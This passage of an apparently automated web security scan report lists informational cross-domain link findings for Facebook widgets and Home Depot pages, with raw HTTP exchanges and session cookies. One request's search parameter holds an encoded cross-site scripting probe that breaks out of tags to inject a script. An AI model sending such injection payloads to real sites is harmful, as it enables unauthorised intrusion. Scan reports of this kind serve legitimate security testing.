http://external.ak.fbcdn.net/safe_image.php?d=69630606552abf367d476c30d84c9e52&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FCNBC_Images%2Fheader%2FCNBC_Logo_PS.gif
http://external.ak.fbcdn.net/safe_image.php?d=8050391a7fdf877236dced9c97f78f34&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__PEOPLE%2FO%2F_OBAMA_BARACK%2Fobama_barack_97_200.jpg
http://external.ak.fbcdn.net/safe_image.php?d=9cac76b751bd27264ad13fece17c09a6&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__REAL_ESTATE%2F_FORECLOSURE%2Fforeclosure_sign2_200.jpg
http://external.ak.fbcdn.net/safe_image.php?d=b105aba841da3336db139104d1f431ea&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__PEOPLE%2FO%2F_OBAMA_BARACK%2Fobama_barack_041211_200.jpg
http://external.ak.fbcdn.net/safe_image.php?d=b1c5d00e8642cae48bd7f89c89abc4d9&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__TECHNOLOGY%2F_INTERNET%2Ffacebook_200.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/l3KbrDcjIMH.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/ZJFvhBcInvq.js
http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/GfxPxxjOIDF.css
http://www.cnbc.com/id/43378490
http://www.cnbc.com/id/43392976
http://www.cnbc.com/id/43395857
http://www.cnbc.com/id/43396080
http://www.cnbc.com/id/43411328
http://www.cnbc.com/id/43412479
http://www.cnbc.com/id/43412781

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.192.43
X-Cnection: close
Date: Thu, 16 Jun 2011 11:26:18 GMT
Content-Length: 13511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/GfxPxxjOIDF.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/l3KbrDcjIMH.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/ZJFvhBcInvq.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_38ed5e99ed82a7c"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.cnbc.com/id/43395857" title="US Housing Crisis Is Now Worse Than Great Depression" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=9cac76b751bd27264ad13fece17c09a6&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__REAL_ESTATE%2F_FORECLOSURE%2Fforeclosure_sign2_200.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.cnbc.com/id/43395857" target="_top">US Housing Crisis Is Now Worse Than Great Depression</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_276393f4d0eca19a"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.cnbc.com/id/43396080" title="Gold to Reach $5,000 Due to Supply Shortage: Report" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=026a927b8f8b822b1c44a49e7beacb7e&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__METALS_MINING%2Fgoldbars_close_200.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.cnbc.com/id/43396080" target="_top">Gold to Reach $5,000 Due to Supply Shortage: Report</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_4541ecca60d39e72"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.cnbc.com/id/43392976" title="Obama: If Debt Limit Not Raised, Financial Crisis Possible" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=8050391a7fdf877236dced9c97f78f34&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__PEOPLE%2FO%2F_OBAMA_BARACK%2Fobama_barack_97_200.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.cnbc.com/id/43392976" target="_top">Obama: If Debt Limit Not Raised, Financial Crisis Possible</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_506df55a93616b2d"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.cnbc.com/id/43412479" title="New Book With ...F... Word in Title is Now Pulp Fiction" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=1c5765a8b25451be6e6f5e2cdf240628&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__BOOKS%2FG%2Fgo_the_f_to_sleep_300.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.cnbc.com/id/43412479" target="_top">New Book With ...F... Word in Title is Now Pulp Fiction</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_65ae3d715e7e47b5"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.cnbc.com/id/43378490" title="Facebook IPO Valuation Could Top $100 Billion: Sources" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=b1c5d00e8642cae48bd7f89c89abc4d9&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__TECHNOLOGY%2F_INTERNET%2Ffacebook_200.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.cnbc.com/id/43378490" target="_top">Facebook IPO Valuation Could Top $100 Billion: Sources</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_e496054baa07cae"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.cnbc.com/id/43412781" title="Nearly Half of US Thinks New Recession is Coming: Poll" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=b105aba841da3336db139104d1f431ea&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__PEOPLE%2FO%2F_OBAMA_BARACK%2Fobama_barack_041211_200.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.cnbc.com/id/43412781" target="_top">Nearly Half of US Thinks New Recession is Coming: Poll</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_5fe98a90d45a7c36"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.cnbc.com/id/43411328" title="Stocks End Sharply Lower; Dow Skids 1.5%" target="_top"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=69630606552abf367d476c30d84c9e52&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FCNBC_Images%2Fheader%2FCNBC_Logo_PS.gif" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.cnbc.com/id/43411328" target="_top">Stocks End Sharply Lower; Dow Skids 1.5%</a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=2" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" alt="" width="14" height="14" /></a>
...[SNIP]...

15.103. http://www.facebook.com/widgets/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/widgets/recommendations.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/widgets/recommendations.php?header=false&height=300&width=377&site=online.wsj.com&border_color=white

The response contains the following links to other domains:

http://online.wsj.com/article/AP731fe15fda8e436395c1cc330a124104.html
http://online.wsj.com/article/SB10001424052702304066504576341212934894494.html
http://online.wsj.com/article/SB10001424052702304066504576341631579541512.html
http://online.wsj.com/article/SB10001424052702304520804576341353063936710.html
http://online.wsj.com/article/SB10001424052748704816604576335162883878514.html
http://online.wsj.com/video/news-hub-what-causing-these-tornadoes/3F4F72BB-C4F8-4F10-BACA-87F24A5848AC.html
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/l3KbrDcjIMH.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/ZJFvhBcInvq.js
http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/GfxPxxjOIDF.css

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.25.22
X-Cnection: close
Date: Thu, 16 Jun 2011 11:22:15 GMT
Content-Length: 11336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/GfxPxxjOIDF.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/l3KbrDcjIMH.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/ZJFvhBcInvq.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_169e77abe93cd4a6"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://online.wsj.com/article/SB10001424052702304066504576341212934894494.html" title="Stephens: An Anti-Israel President" target="_top"></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://online.wsj.com/article/SB10001424052702304066504576341212934894494.html" target="_top">Stephens: An Anti-Israel President</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_7c30eb4c5c73ad38"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://online.wsj.com/video/news-hub-what-causing-these-tornadoes/3F4F72BB-C4F8-4F10-BACA-87F24A5848AC.html" title="News Hub: What's Causing These Tornadoes?" target="_top"></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://online.wsj.com/video/news-hub-what-causing-these-tornadoes/3F4F72BB-C4F8-4F10-BACA-87F24A5848AC.html" target="_top">News Hub: What's Causing These Tornadoes?</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_5bcacded0dd6c56b"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://online.wsj.com/article/SB10001424052748704816604576335162883878514.html" title="Gym, Check. Diet, Check. Face, Lift" target="_top"></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://online.wsj.com/article/SB10001424052748704816604576335162883878514.html" target="_top">Gym, Check. Diet, Check. Face, Lift</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_7e8791d9477e614"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://online.wsj.com/article/AP731fe15fda8e436395c1cc330a124104.html" title="Probe into panhandling dog at NYC ballparks" target="_top"></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://online.wsj.com/article/AP731fe15fda8e436395c1cc330a124104.html" target="_top">Probe into panhandling dog at NYC ballparks</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_767ce023df30b244"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://online.wsj.com/article/SB10001424052702304066504576341631579541512.html" title="Air France Data Point to Pilot Error" target="_top"></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://online.wsj.com/article/SB10001424052702304066504576341631579541512.html" target="_top">Air France Data Point to Pilot Error</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_2e27a5ce0564c4f"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://online.wsj.com/article/SB10001424052702304520804576341353063936710.html" title="Twister Season Proves Deadliest Since 1953" target="_top"></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://online.wsj.com/article/SB10001424052702304520804576341353063936710.html" target="_top">Twister Season Proves Deadliest Since 1953</a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=2" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" alt="" width="14" height="14" /></a>
...[SNIP]...

15.104. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation

Issue detail

The page was loaded from a URL containing a query string:

http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96

The response contains the following links to other domains:

http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=[Page ID];ord=1?
http://www.google.com/afsonline/show_afs_ads.js
http://www.homedepotgardenclub.com/Home.aspx
http://www.homedepotgardenclub.com/Home.aspx?
https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js

Request

GET /Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?Ns=P_REP_PRC_MODE%7C1&storeId=10051&catalogId=10053&langId=-1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a85e5b7-5df4-1ce7-9678-00e0ed194bfc; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; THD_CACHE_NAV_PERSIST=C10%7e24%5f%7eC10%5fEXP%7e; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=oDMMetInv1iHYp16kefFhsmzBsk%3d%0a%3b2011%2d06%2d16+07%3a26%3a40%2e59%5f1308223600358%2d3348%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223792094%3a%3bC25%5fEXP%3d1360063792%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=4; s_pers=%20s_campaign%3Dno%2520value%7C1308225658356%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225658360%3B%20p_30%3DSubcategory%7C1308225658363%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Expires: Thu, 16 Jun 2011 11:31:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:31:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223868476%3a%3bC25%5fEXP%3d1360063868%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:31:08 GMT;Path=/
Set-Cookie: THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:31:08 GMT;Path=/
Set-Cookie: WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d;Domain=.homedepot.com;Path=/
Content-Length: 512942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xmlns="http://ww
...[SNIP]...
<script type="text/javascript" src="https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js"></script>
...[SNIP]...
<li><a class="L3" href="http://www.homedepotgardenclub.com/Home.aspx?" onclick="javascript:findCategoryUrl('http://www.homedepotgardenclub.com/Home.aspx?');s_objectID=url4;return this.s_oc?this.s_oc(e):true">Garden Club</a>
...[SNIP]...
<li><a class="L3" href="http://www.homedepotgardenclub.com/Home.aspx" onclick="javascript:findCategoryUrl('http://www.homedepotgardenclub.com/Home.aspx');s_objectID=url4;return this.s_oc?this.s_oc(e):true">Garden Club</a>
...[SNIP]...
<noscript><iframe src="http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=[Page ID];ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>
<script language="JavaScript" src="http://www.google.com/afsonline/show_afs_ads.js"></script>
...[SNIP]...

15.105. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

Issue detail

The page was loaded from a URL containing a query string:

http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation?langId=-1&storeId=10051&catalogId=10053&Nu=P_PARENT_ID&searchNav=true&keyword=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0000AB%2529%253C%252Fscript%253E&omni=3&selectedCatgry=SEARCH+ALL

The response contains the following links to other domains:

http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=[Page ID];ord=1?
http://www.google.com/afsonline/show_afs_ads.js
http://www.homedepotgardenclub.com/Home.aspx
http://www.homedepotgardenclub.com/Home.aspx?
https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js

Request

GET /Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation?langId=-1&storeId=10051&catalogId=10053&Nu=P_PARENT_ID&searchNav=true&keyword=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0000AB%2529%253C%252Fscript%253E&omni=3&selectedCatgry=SEARCH+ALL HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a85ca6f-5df4-1ce7-9678-00e0ed194bfc; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224138370%3a%3bC25%5fEXP%3d1360064138%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227738451%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2ckQjrscmhQuxLSR9cYv9SV7c0668%3d; s_pers=%20s_scOpen%3D1%7C1308225942967%3B%20s_campaign%3Dno%2520value%7C1308225943059%3B%20s_prevPage%3Dproductdetails%7C1308225943066%3B%20p_30%3DPIP%7C1308225943073%3B; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=6; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20p_v62%3Dnon-major%2520appliance%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 223220
Expires: Thu, 16 Jun 2011 12:15:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:15:46 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308226545942%3a%3bC25%5fEXP%3d1360066545%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:15:45 GMT;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
